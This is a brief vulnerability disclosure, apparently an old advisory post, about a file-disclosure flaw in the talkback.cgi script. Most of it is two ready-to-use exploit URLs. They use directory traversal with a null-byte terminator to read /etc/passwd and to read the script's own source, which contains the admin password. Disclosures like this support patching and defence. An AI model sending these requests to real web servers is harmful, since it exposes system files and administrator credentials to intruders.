Name : talkback (CGI): "show files" vulnurability. Problem: Talkback.cgi may allow remote users (website visitors) to view any file on a webserver (depending on the user the webserver is running on). Exploit: http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../../../../../../../../etc/passwd%00&action=view&matchview=1 This will display the /etc/passwd (if the webserver user has access to this file). Another URL can display the source of talkback.cgi itself that contains the admin password: http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article= ../cgi-bin/talkback.cgi%00&action=view&matchview=1 (You might have to use another URL instead of ../cgi-bin/talkback.cgi%00, this depends on where the cgi-bin is installed) by: Stan a.k.a. ThePike (stan@whizkunde.org)